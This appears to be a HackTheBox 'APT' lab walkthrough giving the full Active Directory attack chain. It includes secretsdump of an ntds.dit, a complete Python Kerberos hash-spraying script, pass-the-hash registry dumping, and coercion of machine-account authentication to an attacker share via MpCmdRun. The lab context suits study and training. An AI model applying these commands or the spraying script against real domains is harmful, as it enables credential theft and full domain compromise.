APT

Notes for https://youtu.be/ZnUIiVwNSHk

User
Get IPv6 Address with https://github.com/mubix/IOXIDResolver​
python3 IOXIDResolver.py -t apt.htb
Address: apt
Address: 10.129.124.109
Address: dead:beef::8884:1fcc:ce90:638f
Secretsdump from backup.zip
secretsdump.py -system SYSTEM -security SECURITY -ntds ../Active\ Directory/ntds.dit LOCAL | tee hashes
Spray Hashes 
Modified from here by InfoSecJack:
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import sys
import argparse
import socket
from time import sleep
import re
from impacket.smbconnection import SMBConnection
from impacket import smbconnection
import multiprocessing
import traceback
import argparse
import sys
from binascii import unhexlify
from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
from impacket.krb5 import constants
from impacket.krb5.types import Principal
import multiprocessing
import socket
​
def gethost_addrinfo(hostname):
    try:
        for res in socket.getaddrinfo(hostname, None, socket.AF_INET6,
                socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
            af, socktype, proto, canonname, sa = res
    except socket.gaierror:
        for res in socket.getaddrinfo(hostname, None, socket.AF_INET,
                socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
            af, socktype, proto, canonname, sa = res
​
    return sa[0]
​
​
def _login(username, password, domain, lmhash, nthash, aesKey, dc_ip):
    dc_ip = gethost_addrinfo(dc_ip)
    try:
        kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        getKerberosTGT(kerb_principal, password, domain,
            unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip)
        print('[+] Success %s/%s' % (domain, username) )
        return True
    except KerberosError as e:
        return False
        if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value):
           print("[-]Could not find username: %s/%s" % (domain, username) )
        elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
            return
        else:
            print(e)
    except socket.error as e:
        print('[-]Could not connect to DC')
        return
​
DOMAIN = 'htb.local'
USERNAME = 'henry.vinson'
def login(username, hash):
	return _login(username, '', DOMAIN, '', hash, None, "apt6.htb")
​
passwords = [x.strip() for x in open("hashes.txt").readlines()]
SLEEP_TIME = 5
​
for x in passwords:
	if login(USERNAME, x):
		print(f"[+] Success {x}")
		exit()
Dump Remote Registry
reg.py htb.local/[email protected] -hashes :*** query -keyName HKU -s | tee hku.reg
Root
Authenticate with Machine Account to our box
C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\***\xct\xct'
Secretsdump with Machine Account
secretsdump.py htb.local/'APT$'@apt6.htb -hashes :***

HackTheBox - Previous

Luanne

Next - HackTheBox

Attended

Last modified 1yr ago

APT

User

Get IPv6 Address with https://github.com/mubix/IOXIDResolver​

Secretsdump from backup.zip

Spray Hashes

Dump Remote Registry

Root

Authenticate with Machine Account to our box

Secretsdump with Machine Account

Get IPv6 Address with https://github.com/mubix/IOXIDResolver